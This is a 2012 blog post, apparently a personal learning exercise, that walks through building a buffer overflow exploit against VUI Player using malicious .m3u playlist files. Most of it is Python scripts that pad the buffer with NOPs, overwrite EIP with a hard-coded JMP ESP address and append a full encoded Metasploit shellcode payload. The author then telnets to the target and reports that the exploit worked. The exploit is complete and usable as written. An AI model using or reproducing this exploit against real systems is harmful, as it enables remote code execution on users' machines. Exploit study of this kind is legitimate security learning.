Tuesday, February 14, 2012

Trying to Expoit VUI Player Via Buffer Overflow Vulnerability

First I try to create fuzzer


buffer += "\x41" * 1500;
filename = "vui" + ".m3u";
file = open(filename,"w")
file.writelines(buffer)
file.close()

I save it with fuzzvui.py, run with python, it work well to make VUI Player crash..

Then I try to make pattern character with pattern create, and replace the buffer with it, and try to analyze in what number of character EIP is overwritten with pattern offset, after that I make sure the EIP is overwritten, by changing the fuzzer script.

----------------------------
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit2" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
----------------------------

I run it, and load file .m3u with VUI attached with Ollydbg. It's work

 But if I change the fuzzer script to create m3u file to exploit the Windows via VUI, it's not work..
 ...

Ok, Let's analyze the memory address..

Let's change fuzzer script into :
...........................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\xCC" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
...........................

To know what happen with EIP when we try to overwrite it with JMP ESP address..


Let's try again with breakpoint in JMP ESP address

The same thing happen, breakpoint not work..
Let's change fuzzer script again

.......................................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
And set the breakpoint
.Unfortunately the breakpoint not work...

Change fuzzer scrip again. We try to add space between EIP addres and stack ...

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
We also set breakpoint in JMP ESP memory address

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += "\xCC" * 32
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................


OK, it's work whe we try to add space "\x90" - NOP (No Operation) between EIP and stack.

So, let's try it with opcode metsploit to exploit Windows OD (the detail step to create it is in the previous article)

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................

Now, let's try open vuiploit.m3u created by the fuzzer in VUI Player.

Then, we try to telnet the target ...

Ok, we have done it successfully ...


0 komentar:

Post a Comment